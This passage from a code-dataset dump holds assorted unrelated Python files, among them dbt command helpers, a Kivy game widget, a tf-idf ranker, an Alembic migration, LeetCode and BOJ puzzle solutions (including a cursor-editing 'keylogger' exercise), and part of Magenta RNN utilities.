default_arguments.append(f'{get_cli_kwargs(resource_type=rt)}')\n default_arguments = ' '.join(default_arguments)\n arguments = get_cli_kwargs(**kwargs)\n all_arguments = f'{default_arguments} {arguments} --output {output}'\n command = f\"dbt ls {all_arguments}\"\n logger.debug(f'Running command: {command}')\n result = ctx.run(command, hide=hide)\n result_lines = result.stdout.splitlines()\n if output == 'json':\n result_lines = [\n json.loads(result_json) for result_json in result_lines\n ]\n return result_lines\n\n\ndef get_cli_kwargs(**kwargs):\n \"\"\"\n Transform Python keyword arguments to CLI keyword arguments\n\n :param kwargs: Keyword arguments\n :return: CLI keyword arguments\n \"\"\"\n return ' '.join(\n [\n f'--{k.replace(\"_\", \"-\")} {str(v).replace(\",\", \" \")}'\n for k, v in kwargs.items()\n if v\n ]\n )\n\n\ndef dbt_run_operation(\n ctx,\n macro_name,\n project_dir=None,\n profiles_dir=None,\n profile=None,\n target=None,\n vars=None,\n bypass_cache=None,\n hide=True,\n logger=None,\n **kwargs,\n):\n \"\"\"\n Perform a dbt run-operation\n (see https://docs.getdbt.com/reference/commands/run-operation/)\n\n :param ctx: An Invoke context object\n :param macro_name: Name of macro that will be run\n :param project_dir: An argument for the dbt run-operation command\n (run \"dbt run-operation --help\" for details)\n :param profiles_dir: An argument for the dbt run-operation command\n (run \"dbt run-operation --help\" for details)\n :param profile: An argument for the dbt run-operation command\n (run \"dbt run-operation --help\" for details)\n :param target: An argument for the dbt run-operation command\n (run \"dbt run-operation --help\" for details)\n :param vars: An argument for the dbt run-operation command\n (run \"dbt run-operation --help\" for details)\n :param bypass_cache: An argument for the dbt run-operation command\n (run \"dbt run-operation --help\" for details)\n :param hide: Whether to suppress command line logs\n :param logger: A logging.Logger object\n :param kwargs: Arguments for defining macro's parameters\n :return: stdout in list where each item is one line of output\n \"\"\"\n if not logger:\n logger = get_logger('')\n dbt_kwargs = {\n 'project_dir': project_dir or ctx.config['project_path'],\n 'profiles_dir': profiles_dir,\n 'profile': profile,\n 'target': target,\n 'vars': vars,\n 'bypass_cache': bypass_cache,\n }\n dbt_cli_kwargs = get_cli_kwargs(**dbt_kwargs)\n macro_kwargs = json.dumps(kwargs, sort_keys=False)\n command = (\n f\"dbt run-operation {dbt_cli_kwargs}\"\n f\" {macro_name} --args '{macro_kwargs}'\"\n )\n logger.debug(f'Running command: {command}')\n result = ctx.run(command, hide=hide)\n result_lines = result.stdout.splitlines()[1:]\n return result_lines\n\n\ndef get_macro(macro_name):\n \"\"\"\n Get the configured macro\n\n :param macro_name: The name of the macro to add\n :return: The macro itself in string form\n \"\"\"\n return MACROS[macro_name]\n\n\ndef macro_exists(ctx, macro_name, logger=None, **kwargs):\n \"\"\"\n Check if a given macro name exists in the dbt project\n\n :param ctx: An Invoke context object\n :param macro_name: The name of the macro to check for\n :param logger: A logging.Logger object\n :param kwargs: Additional arguments for dbt_run_operation\n :return: True if the macro exists, else False\n \"\"\"\n if not logger:\n logger = get_logger('')\n try:\n dbt_run_operation(\n ctx,\n macro_name,\n logger=logger,\n sql=f'SELECT 1 AS __dbt_invoke_check_macro_{macro_name} LIMIT 0',\n **kwargs,\n )\n except Exception as 
exc:\n if all(\n [\n s in str(exc).lower()\n for s in ['runtime error', 'not', 'find', macro_name]\n ]\n ):\n return False\n else:\n logger.exception(exc)\n return True\n\n\ndef add_macro(ctx, macro_name, logger=None):\n \"\"\"\n Add a macro to a dbt project if the user confirms\n\n :param ctx: An Invoke context object\n :param macro_name: The name of the macro to add\n :param logger: A logging.Logger object\n :return: None\n \"\"\"\n if not logger:\n logger = get_logger('')\n location = Path(ctx.config['macro_paths'][0], f'{macro_name}.sql')\n logger.warning(\n f'This command requires the following macro:'\n f'\\n{get_macro(macro_name)}'\n )\n question = (\n f'Would you like to add the macro \"{macro_name}\"'\n f' to the following location?:\\n{location}'\n )\n prompt = (\n 'Please enter \"y\" to confirm macro addition,'\n ' \"n\" to abort,'\n ' or \"a\" to provide an alternate location.'\n )\n add_confirmation = input(f'{question}\\n{prompt}\\n')\n while add_confirmation.lower() not in ['y', 'n', 'a']:\n add_confirmation = input(f'{prompt}\\n')\n if add_confirmation.lower() == 'n':\n logger.info('Macro addition aborted.')\n sys.exit()\n elif add_confirmation.lower() == 'a':\n alternate_prompt = (\n 'Please enter a path (ending in \".sql\")'\n ' to a new or existing macro file'\n ' in one of your existing dbt macro-paths.\\n'\n )\n location = Path(input(alternate_prompt))\n absolute_macro_paths = [\n mp.resolve() for mp in ctx.config['macro_paths']\n ]\n while (\n location.parent.resolve() not in absolute_macro_paths\n or location.suffix.lower() != '.sql'\n ):\n if location.parent.resolve() not in absolute_macro_paths:\n not_a_macro_path = (\n f'{location.parent.resolve()}'\n f' is not an existing macro path.'\n )\n existing_macro_paths_are = 'Your existing macro paths are:'\n existing_macro_paths = \"\\n\".join(\n [str(mp) for mp in absolute_macro_paths]\n )\n logger.warning(\n f'{not_a_macro_path}'\n f'\\n{existing_macro_paths_are}'\n f'\\n{existing_macro_paths}'\n )\n if location.suffix.lower() != '.sql':\n logger.warning('File suffix must be \".sql\".')\n location = Path(input(alternate_prompt))\n with location.open('a') as f:\n f.write(f'{get_macro(macro_name)}')\n logger.info(f'Macro \"{macro_name}\" added to {location.resolve()}')\n\n\nclass Project:\n \"\"\"\n A placeholder class for use with get_nearest_project_dir\n \"\"\"\n\n def __init__(self, project_dir=None):\n \"\"\"\n Initialize a Project object\n\n :param project_dir:\n \"\"\"\n self.project_dir = project_dir\n","sub_path":"dbt_invoke/internal/_utils.py","file_name":"_utils.py","file_ext":"py","file_size_in_byte":12373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"451357931","text":"import csv\r\nimport sys\r\n\r\n#read_csv function accepts a file name, and parses it with the file handle being returned to the invoking function\r\ndef read_csv(file_name):\r\n\tfile_handle = open(file_name,\"r\")\r\n\tprint (file_name)\r\n\tcsv_lines = csv.reader (file_handle)\t\t#csv.reader is used to read a csv file\r\n\treturn csv_lines\r\n\r\ndef print_csv(csv_data):\r\n\tfor line in csv_data:\r\n\t\tprint (line)\r\n\t\r\n\t\r\nif __name__ == \"__main__\":\r\n\tfile_name = sys.argv[1]\r\n\ttry:\r\n\t\tif len(sys.argv) > 0:\r\n\t\t\tcsv_data = read_csv (file_name)\t\t\t\t# Exception handling to be performed over predicted failure points. 
{"seq_id":"597606486","text":"from kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.button import Button\nfrom kivy.uix.label import Label\nfrom widgets.HealthBar import HealthBar\n\n\nclass Game(BoxLayout):\n    def __init__(self, socket, **kwargs):\n        super(Game, self).__init__(**kwargs)\n        self.orientation = \"vertical\"\n\n        self.full_answer = Label(font_size=30)\n        self.number_grid = GridLayout(cols=3)\n        self.hud = BoxLayout(spacing=2, size_hint=(1, 0.3))\n\n        for text in range(1, 10):\n            self.number_grid.add_widget(Button(text=str(text), on_press=self.add_number))\n\n        self.number_label = Label(text=\"\", font_size=29)\n\n        self.health = HealthBar(3)\n        self.hud.add_widget(self.health)\n\n        self.add_widget(self.hud)\n        self.add_widget(self.full_answer)\n\n        self.add_widget(self.number_label)\n        answer_input = BoxLayout(orientation=\"horizontal\")\n\n        answer_input.add_widget(self.number_grid)\n        manipulation_buttons = BoxLayout(orientation=\"vertical\", size_hint=(0.3, 1))\n\n        manipulation_buttons.add_widget(Button(text=\"<=\", on_press=self.pop_number))\n        self.client_socket = socket\n\n        self.send_button = Button(text=\"Send\", on_press=self.send_number)\n        manipulation_buttons.add_widget(self.send_button)\n\n        answer_input.add_widget(manipulation_buttons)\n        self.add_widget(answer_input)\n\n    def pop_number(self, _):\n        try:\n            self.number_label.text = self.number_label.text[:len(self.number_label.text) - 1]\n\n        except IndexError:\n            pass\n\n    def add_number(self, instance):\n        self.number_label.text += instance.text\n\n    def get_answer(self):\n        return self.full_answer.text\n\n    def send_number(self, _):\n        self.client_socket.send(self.number_label.text.encode(\"utf-8\"))\n        self.number_label.text = \"\"\n","sub_path":"widgets/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"312165343","text":"# Runtime error => time limit exceeded => solved at last!\nfrom sys import stdin\nfrom collections import deque\n\nfor _ in range(int(stdin.readline())):\n    string = stdin.readline().strip()\n    cusor, cusor_len = 0, 0\n    ans = deque()\n    for s in string:\n        # print(cusor)\n        if s == '-':\n            if cusor:\n                del ans[cusor-1]\n                cusor -= 1\n                cusor_len -= 1\n        elif s == '<':\n            if cusor:\n                cusor -= 1\n        elif s == '>':\n            if cusor < cusor_len:\n                cusor += 1\n        else:\n            ans.insert(cusor, s)\n            cusor += 1\n            cusor_len += 1\n    print(''.join(ans))\n\n'''\n1. My approach above first ended with a runtime error.\n- I thought the input was being handled according to the given conditions while moving the cursor,\n- and it did produce output, but the code apparently had a problem somewhere.\n- It also felt shaky time-wise. (After fixing that: time limit exceeded...)\n\n2. Solved by improving the code\n- The time problem was solved in 2 ways\n  - with stdin.readline()\n  - with deque() instead of a list\n- As for the runtime error\n  - the conditions were adjusted a little\n  - on '-', after deleting, move the cursor back one step and shrink the total length as well.\n  - not accounting for how far the cursor had moved (cusor_len) was probably the cause of the error.\n\n3. The core of the keylogger problem\n- is to think in terms of a left side and a right side around the cursor.\n- On '-', if the left side has a value, pop() it to delete.\n- On '<', if the left side has a value, pop() it from the left and append it to the right.\n- On '>', if the right side has a value, pop() it from the right and append it to the left.\n- For any other character, append it to the left.\n\n- Once the traversal of the input string is finished,\n  - the right-side result is in reverse order, so it must be reversed.\n  - extend the left side with the right-side result.\n- Print.\n\n4. Summary\n- I had not come up with the two-way stack; it seems applicable to other problems too. Remember it well.\n- Whenever speed or memory becomes a problem, be sure to think of stdin, deque, etc.; they might solve it..!\n\n'''\n","sub_path":"python/BOJ/02_스택/BOJ5397_키로거.py","file_name":"BOJ5397_키로거.py","file_ext":"py","file_size_in_byte":2255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
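Item 3 of the notes in the record above describes a two-stack (two-list) solution that removes the manual cursor arithmetic entirely; a minimal sketch of that approach for the same input format:

from sys import stdin

def keylogger(keys):
    left, right = [], []                  # characters to the left/right of the cursor
    for s in keys:
        if s == '-':
            if left:
                left.pop()                # backspace: delete the character before the cursor
        elif s == '<':
            if left:
                right.append(left.pop())  # move the cursor one step left
        elif s == '>':
            if right:
                left.append(right.pop())  # move the cursor one step right
        else:
            left.append(s)                # type a character at the cursor
    return ''.join(left) + ''.join(reversed(right))

for _ in range(int(stdin.readline())):
    print(keylogger(stdin.readline().strip()))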
{"seq_id":"294822388","text":"#!/usr/bin/env python3\n\nimport pexpect\nimport os\nimport sys\n\ntimeout = 20*60\n\nif len(sys.argv) != 2:\n    print('Name of directory with rockhopper source is required!')\n    sys.exit(5)\n\nos.chdir(sys.argv[1])\n\nlogfile = open('logfile.log', 'ab')\n\nchild = pexpect.spawn('./install.sh 2>/dev/null')\nchild.logfile = logfile\n\nwhile True:\n    i = child.expect([\"Push \", # 0\n                      \"Do you want to overwrite the old installation anyway?\", # 1\n                      \"Rockhopper was successfully installed\", # 2\n                      \"Do you want to try installation of the package now?\", # 3\n                      \"Do you want to continue?\", # 4\n                      pexpect.TIMEOUT, # 5\n                      pexpect.EOF, # 6\n                      \"\\[Y/n\\]\", # 7\n                      ], timeout=timeout)\n    if i == 0:\n        child.send(\"\\n\")\n    elif i == 1:\n        child.send(\"y\\n\")\n    elif i == 2:\n        print('Rockhopper was successfully installed')\n        logfile.close()\n        sys.exit(0)\n    elif i == 3:\n        child.send(\"y\\n\")\n    elif i == 4:\n        child.send(\"y\\n\")\n    elif i == 5:\n        print('TIMEOUT')\n        logfile.close()\n        sys.exit(0)\n    elif i == 6:\n        print('EOF')\n        logfile.close()\n        sys.exit(0)\n    elif i == 7:\n        child.send(\"\\n\")\n\n","sub_path":"mko-vps/roles/vpn_server/files/expect_rockhopper.py","file_name":"expect_rockhopper.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"597606486","text":"import csv\nimport re\nimport math\nimport sys\nfrom collections import Counter\n\n#Read the information from file\nwith open (\"../data/cleaned_songtitles.txt\") as f:\n\tr = csv.reader(f, delimiter='|', quoting=csv.QUOTE_NONE)\n\t#Regular expression doesn't include numbers or foreign characters\n\trgx = re.compile(r'\\b[a-zA-Z]+\\b')\n\tdocs = [ (' '.join(re.findall(rgx, x[1])).lower(), ' '.join(re.findall(rgx, x[2])).lower(), \\\n\t\t''.join(x[1]), ''.join(x[2])) for i,x in enumerate(r) if i > 1 ]\n\n\n#Collections\nsongs_a = [ d[0] for d in docs ] #Author's name \norg_songs_a = [d[2] for d in docs ] #This is the de-normalized Author's name\nsongs_t = [ d[1] for d in docs ] #Title of the song\norg_songs_t = [d[3] for d in docs ] #De-normalized Title of the song\nsongs_i = range(0, len(songs_a)) #Index of the song in corpus\n\n#Helper function to pprint results - adapted from Lecture CST 495 Matt Gardner\ndef print_results(results, n, head=True):\n\tif head:\n\t\tprint(\"\\nTop %d from recall set of %d items:\" % (n, len(results)))\n\tfor r in results[:n]:\n\t\tprint (\"\\t%0.2f - %s by %s\" % (r[0], org_songs_t[r[1]], org_songs_a[r[1]]))\n\n#Create the inverted index matrix - adapted from Lecture CST 495 Matt Gardner\ndef create_inverted_index(corpus):\n\tidx = {}\n\tfor i, doc in enumerate(corpus):\n\t\tfor word in doc.split():\n\t\t\tif word in idx:\n\t\t\t\tif i in idx[word]:\n\t\t\t\t\tidx[word][i] += 1\n\t\t\t\telse:\n\t\t\t\t\tidx[word][i] = 1\n\t\t\telse:\n\t\t\t\tidx[word] = {i:1}\n\treturn idx\n\n#Get the idf - adapted from Lecture CST 495 Matt Gardner\ndef idf(term, idx, n):\n\treturn math.log( float(n) / (1 + len(idx[term])))\n\n#Accepts the query, inverted index, and n <- n = initial size of corpus\n#Returns the resulting scores - adapted from Lecture CST 495 Matt Gardner\ndef get_results_tfidf(qry, idx, n):\n\tscore = Counter()\n\tfor term in qry.split():\n\t\tif term in idx:\n\t\t\ti = idf(term, idx, n)\n\t\t\tfor doc in idx[term]:\n\t\t\t\tscore[doc] += idx[term][doc] * i\n\n\tresults = []\n\tfor x in [[r[0],r[1]] for r in zip(score.keys(), score.values())]:\n\t\tif x[1] > 0:\n\t\t\tresults.append([x[1],x[0]])\n\n\tsorted_results = sorted(results, key = lambda t: t[0] * -1)\n\treturn sorted_results\n\n\n#Inverted index \n#Get the results based on input from command line\nidx = create_inverted_index(songs_t)\nresults = get_results_tfidf(sys.argv[1], idx, len(songs_i))\nprint_results(results, 10)\n\n","sub_path":"rankers/ranker.py","file_name":"ranker.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
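The ranker record above scores titles with tf-idf over an inverted index; here is a self-contained toy run of the same scheme (corpus and query are invented for illustration):

import math
from collections import Counter

corpus = ['the yellow submarine', 'yellow river', 'the wall']  # toy corpus

# Inverted index: term -> {doc_id: term frequency}, as in create_inverted_index.
idx = {}
for doc_id, doc in enumerate(corpus):
    for word in doc.split():
        idx.setdefault(word, Counter())[doc_id] += 1

def idf(term, idx, n):
    # Same smoothed form as the record: log(N / (1 + document frequency)).
    return math.log(float(n) / (1 + len(idx[term])))

def get_results_tfidf(qry, idx, n):
    score = Counter()
    for term in qry.split():
        if term in idx:
            weight = idf(term, idx, n)
            for doc_id, tf in idx[term].items():
                score[doc_id] += tf * weight
    return [[s, d] for d, s in score.most_common() if s > 0]

print(get_results_tfidf('yellow submarine', idx, len(corpus)))
# -> [[0.405..., 0]]: only doc 0 scores above zero for this query,
# because 'yellow' appears in 2 of 3 docs and gets idf log(3/3) = 0.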
{"seq_id":"187834873","text":"\"\"\"Add QuestionComment model.\n\nRevision ID: 36d6b61d3bce\nRevises: 41e2fee079b\nCreate Date: 2015-05-30 15:41:42.216987\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '36d6b61d3bce'\ndown_revision = '41e2fee079b'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n    ### commands auto generated by Alembic - please adjust! ###\n    op.create_table('question_comment',\n    sa.Column('id', sa.Integer(), nullable=False),\n    sa.Column('content', sa.Text(), nullable=True),\n    sa.Column('created_at', sa.DateTime(), nullable=True),\n    sa.Column('question_id', sa.Integer(), nullable=True),\n    sa.Column('user_id', sa.Integer(), nullable=True),\n    sa.ForeignKeyConstraint(['question_id'], ['question.id'], ),\n    sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n    sa.PrimaryKeyConstraint('id')\n    )\n    ### end Alembic commands ###\n\n\ndef downgrade():\n    ### commands auto generated by Alembic - please adjust! ###\n    op.drop_table('question_comment')\n    ### end Alembic commands ###\n","sub_path":"migrations/versions/20150530154142_36d6b61d3bce_add_questioncomment_model.py","file_name":"20150530154142_36d6b61d3bce_add_questioncomment_model.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
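The Alembic migration above autogenerates the question_comment table; the model it was likely generated from would look roughly like the following (a hypothetical reconstruction using Flask-SQLAlchemy; column names and foreign keys follow the migration, everything else is an assumption):

from flask_sqlalchemy import SQLAlchemy

db = SQLAlchemy()

class QuestionComment(db.Model):
    __tablename__ = 'question_comment'  # matches op.create_table above

    id = db.Column(db.Integer, primary_key=True)
    content = db.Column(db.Text)
    created_at = db.Column(db.DateTime)
    question_id = db.Column(db.Integer, db.ForeignKey('question.id'))
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'))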
{"seq_id":"214425853","text":"##############################################\n## Author: I-No Liao ##\n## Date of update: 2018/04/10 ##\n## Description: Leetcode #100 ##\n##############################################\n\n# Given two binary trees, write a function to check if they are the same or not.\n# \n# Two binary trees are considered the same if they are structurally identical and the nodes have the same value.\n# \n# \n# Example 1:\n# \n# Input: 1 1\n# / \\ / \\\n# 2 3 2 3\n# \n# [1,2,3], [1,2,3]\n# \n# Output: true\n# Example 2:\n# \n# Input: 1 1\n# / \\\n# 2 2\n# \n# [1,2], [1,null,2]\n# \n# Output: false\n# Example 3:\n# \n# Input: 1 1\n# / \\ / \\\n# 2 1 1 2\n# \n# [1,2,1], [1,1,2]\n# \n# Output: false\n\n# Definition for a binary tree node.\nclass TreeNode:\n    def __init__(self, x):\n        self.val = x\n        self.left = None\n        self.right = None\n\nclass Solution:\n    # @param p, TreeNode\n    # @param q, TreeNode\n    # @return boolean\n    def isSameTree(self, p, q):\n        if not p and not q:\n            return True\n        elif not p or not q or p.val != q.val:\n            return False\n        else:\n            return self.isSameTree(p.left, q.left) and self.isSameTree(p.right, q.right)\n\nclass Solution_2:\n    def isSameTree(self, p, q):\n        stk = []\n        stk.append(p)\n        stk.append(q)\n        while stk:\n            n1 = stk.pop()\n            n2 = stk.pop()\n            if not n1 and not n2:\n                continue\n            elif not n1 or not n2 or n1.val != n2.val:\n                return False\n            else:\n                stk.append(n1.left)\n                stk.append(n2.left)\n                stk.append(n1.right)\n                stk.append(n2.right)\n        return True\n\n# Main\nif __name__ == '__main__':\n    n0 = TreeNode(1)\n    n1 = TreeNode(2)\n    n2 = TreeNode(3)\n    n0.left, n0.right = n1, n2\n\n    m0 = TreeNode(1)\n    m1 = TreeNode(2)\n    m2 = TreeNode(3)\n    m0.left, m0.right = m1, m2\n\n    print('----- Solution 1 -----')\n    print(Solution().isSameTree(n0, m0))\n    print('----- Solution 2 -----')\n    print(Solution_2().isSameTree(n0, m0))\n","sub_path":"100_SameTree.py","file_name":"100_SameTree.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
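Both solutions in the record above compare the trees node by node; the same check can also be phrased as preorder serialization with explicit null markers. A short sketch reusing the record's TreeNode class:

def serialize(node):
    # Preorder walk; '#' marks absent children so shape is captured, not just values.
    if not node:
        return ['#']
    return [str(node.val)] + serialize(node.left) + serialize(node.right)

def is_same_tree(p, q):
    return serialize(p) == serialize(q)

# e.g. with the trees built in the record's __main__ block:
# is_same_tree(n0, m0) -> True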
{"seq_id":"581083071","text":"from matplotlib.patches import Circle\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\t# Side length of the square\nx = np.arange(-0.5, 0.6, 0.1)\n\t# Radius of the circles\nr = 0.5\n\t# Figure margins\nmargins = [0.2, 0.15, 0.7, 0.8]\n\n\t# Create the figure and the axes\nfig = plt.figure(figsize = (4, 4), dpi = 200)\nax = fig.add_axes(margins)\nax.set_ylim(-1.2, 1.2)\nax.set_xlim(-1.2, 1.2)\nax.set_aspect(\"equal\")\n\n\t# Draw the square\ncote1 = ax.plot(x, 0*x + 0.5, \"g\")\ncote2 = ax.plot(x, 0*x - 0.5, \"g\")\ncote3 = ax.plot(0*x + 0.5, x, \"g\")\ncote4 = ax.plot(0*x - 0.5, x, \"g\")\n\n\t# Draw the circles\ncercle1 = plt.Circle((0.5, 0.5), r, color = \"r\", fill = True)\ncercle2 = plt.Circle((0.5, -0.5), r, color = \"y\", fill = True)\ncercle3 = plt.Circle((-0.5, 0.5), r, color = \"c\", fill = True)\ncercle4 = plt.Circle((-0.5, -0.5), r, color = \"b\", fill = True)\nax.add_artist(cercle1)\nax.add_artist(cercle2)\nax.add_artist(cercle3)\nax.add_artist(cercle4)\n\n\t# Axis labels\nax.set_xlabel(\"x\")\nax.set_ylabel(\"y\")\nax.minorticks_on()\n\n\t# Show the axes\nax.axhline(y = 0, color = \"k\")\nax.axvline(x = 0, color = \"k\")\n\nplt.title(\"Figure 1\")\nplt.figtext(0.05, 0.07, \"Figure 1: Square of side 1 centered at the point (0, 0), with filled circles at the corners\", fontsize = \"xx-small\", wrap = True)\nplt.savefig(\"figure1.png\")\nplt.show()\n","sub_path":"source/tp/3/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"120985501","text":"from collections import Counter\nimport jieba\n\n# Create a function that counts the frequency of each English word in the argument\ndef stats_text_en(text,count):\n    elements = text.split()\n    words = []\n    symbols = ',.*-!'\n    for element in elements:\n        for symbol in symbols:\n            element = element.replace(symbol,'')\n        # Use the isascii method of the str type to decide whether this is an English word\n        if len(element) and element.isascii():\n            words.append(element)\n    return Counter(words).most_common(count)\n\n\n# Define a function that counts the occurrences of each Chinese term in the argument\ndef stats_text_cn(text,count):\n    characters_cn = []\n    characters_1 = jieba.cut(text,cut_all=False)\n    for character in characters_1:\n        if len(character) >= 2:\n            characters_cn.append(character)\n    return Counter(characters_cn).most_common(count)\n\n\n# Create a function that calls stats_text_en and stats_text_cn in turn\ndef stats_text(text,count):\n    \"\"\"\n    Call stats_text_en and stats_text_cn and return the merged word-frequency results\n    \"\"\"\n    if not isinstance(text,str):\n        raise ValueError('The input argument must be of type str; the current input type is %s'%type(text))\n    return stats_text_en(text,count) + stats_text_cn(text,count)\n","sub_path":"exercises/1901090061/d12/mymodule/stats_word.py","file_name":"stats_word.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
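A quick usage sketch for the mixed-language counter above (assumes jieba is installed and an import path mirroring the record's sub_path; the sample sentence is arbitrary):

from mymodule.stats_word import stats_text

sample = 'the quick fox and the lazy dog 你好 世界 你好'
# Merges Counter.most_common(2) from both helpers, e.g. [('the', 2), ...]
print(stats_text(sample, 2))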
{"seq_id":"374146927","text":"# Copyright 2016 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Utilities for polyphonic RNN.\"\"\"\n\nfrom collections import OrderedDict\nimport copy\nimport os\nimport uuid\n\n# internal imports\n\nimport numpy as np\nfrom scipy import linalg\nimport tensorflow as tf\n\nimport magenta.music as mm\nfrom magenta.protobuf import music_pb2\n\n# This list represents the duration times (in seconds) that are supported.\n# If an input NoteSequence contains a note duration that is not in this list,\n# the entire NoteSequence will be discarded.\n# TODO(fjord): this filtering should happen at dataset creation time.\nTIME_CLASSES = [0.125, 0.25, 0.5, 0.75, 1.0, 1.5, 2.0, 3.0, 4.0, 6.0, 8.0, 12.0]\n\n##\n# begin metautils\n##\n\n\ndef shape(x):\n  \"\"\"Returns tensor shape as a tuple of integers, None dimensions as -1.\"\"\"\n  return tuple([-1 if d is None else d for d in x.get_shape().as_list()])\n\n\ndef ndim(x):\n  \"\"\"Returns the number of dimensions of the TensorFlow variable `x`.\n\n  Args:\n    x: A TensorFlow tensor object.\n\n  Returns:\n    An integer denoting the number of dimensions in `x`.\n  \"\"\"\n  return x.get_shape().ndims\n\n\ndef dot(a, b):\n  # Generalized dot for nd sequences, assumes last axis is projection\n  # b must be rank 2\n  a_tup = shape(a)\n  b_tup = shape(b)\n  a_i = tf.reshape(a, [-1, a_tup[-1]])\n  a_n = tf.matmul(a_i, b)\n  a_n = tf.reshape(a_n, list(a_tup[:-1]) + [b_tup[-1]])\n  return a_n\n\n\ndef ni_slice(sub_values, last_ind, axis=0):\n  # TODO: Allow both to be negative indexed...\n  ndims = len(shape(sub_values))\n  im1 = 0 + abs(last_ind)\n  i = [[None, None]] * ndims\n  i[axis] = [im1, None]\n  am = [False] * ndims\n  am[axis] = True\n  sl = [slice(*ii) for ii in i]\n  ti = tf.reverse(sub_values, am)[sl]\n  return tf.reverse(ti, am)\n\n\ndef ni(t, ind, axis=0):\n  # Negative single index helper\n  ndims = len(shape(t))\n  im1 = -1 + abs(ind)\n  i = [[None, None]] * ndims\n  i[axis] = [im1, im1 + 1]\n  am = [False] * ndims\n  am[axis] = True\n  sl = [slice(*ii) for ii in i]\n  ti = tf.reverse(t, am)[sl]\n  return ti[0, :, :]\n\n\ndef scan(fn, sequences, outputs_info):\n  # for some reason TF step needs initializer passed as first argument?\n  # a tiny wrapper to tf.scan to make my life easier\n  # closer to theano scan, allows for step functions with multiple arguments\n  # may eventually have kwargs which match theano\n  for i in range(len(sequences)):\n    # Try to accommodate masks...\n    seq = sequences[i]\n    nd = ndim(seq)\n    if nd == 3:\n      pass\n    elif nd < 3:\n      sequences[i] = tf.expand_dims(sequences[i], nd)\n    else:\n      raise ValueError('Ndim too different to correct')\n\n  def check(l):\n    shapes = [shape(s) for s in l]\n    # for now assume -1, can add axis argument later\n    # check shapes match for concatenation\n    compat = [ls for ls in shapes if ls[:-1] == shapes[0][:-1]]\n    if len(compat) != len(shapes):\n      raise ValueError('Tensors *must* be the same dim for now')\n\n  check(sequences)\n  check(outputs_info)\n\n  seqs_shapes = [shape(s) for s in sequences]\n  nd = len(seqs_shapes[0])\n  
seq_pack = tf.concat(nd - 1, sequences)\n outs_shapes = [shape(o) for o in outputs_info]\n nd = len(outs_shapes[0])\n init_pack = tf.concat(nd - 1, outputs_info)\n\n assert len(shape(seq_pack)) == 3\n assert len(shape(init_pack)) == 2\n\n def s_e(shps):\n starts = []\n ends = []\n prev_shp = 0\n for _, shp in enumerate(shps):\n start = prev_shp\n end = start + shp[-1]\n starts.append(start)\n ends.append(end)\n prev_shp = end\n return starts, ends\n\n # TF puts the initializer in front?\n def fnwrap(initializer, elems):\n starts, ends = s_e(seqs_shapes)\n sliced_elems = [elems[:, start:end] for start, end in zip(starts, ends)]\n starts, ends = s_e(outs_shapes)\n sliced_inits = [initializer[:, start:end]\n for start, end in zip(starts, ends)]\n t = []\n t.extend(sliced_elems)\n t.extend(sliced_inits)\n # elems first then inits\n outs = fn(*t)\n nd = len(outs_shapes[0])\n outs_pack = tf.concat(nd - 1, outs)\n return outs_pack\n\n r = tf.scan(fnwrap, seq_pack, initializer=init_pack)\n\n if len(outs_shapes) > 1:\n starts, ends = s_e(outs_shapes)\n o = [r[:, :, start:end] for start, end in zip(starts, ends)]\n return o\n else:\n return r\n\n##\n# end metautils\n##\n\n##\n# begin datasets\n##\n\n\ndef duration_and_pitch_to_midi(filename, durations, pitches, prime_until=0):\n # durations and pitches should both be 2D\n # [time_steps, n_notes]\n\n sequence = music_pb2.NoteSequence()\n\n # Hardcode for now, eventually randomize?\n # or predict...\n sequence.ticks_per_quarter = mm.STANDARD_PPQ\n ts = sequence.time_signatures.add()\n ts.time = 1.0\n ts.numerator = 4\n ts.denominator = 4\n\n ks = sequence.key_signatures.add()\n ks.key = 0\n ks.mode = ks.MAJOR\n\n tempos = sequence.tempos.add()\n tempos.qpm = 120\n # ti.simultaneous_notes\n sn = 4\n\n # Translate durations from TIME_CLASSES indexes to TIME_CLASSES values.\n # First, find the data to change, then change it.\n # If we don't do this as separate steps, we'll end up changing some data\n # more than once.\n dt = copy.deepcopy(durations)\n time_class_indexes = []\n for i in range(len(TIME_CLASSES)):\n time_class_indexes.append(dt == i)\n for i, time in enumerate(TIME_CLASSES):\n dt[time_class_indexes[i]] = time\n\n delta_times = [dt[..., i] for i in range(sn)]\n end_times = [delta_times[i].cumsum(axis=0) for i in range(sn)]\n start_times = [end_times[i] - delta_times[i] for i in range(sn)]\n voices = [pitches[..., i] for i in range(sn)]\n\n midi_notes = []\n default_instrument = 0\n default_program = 0\n priming_instrument = 79\n priming_program = 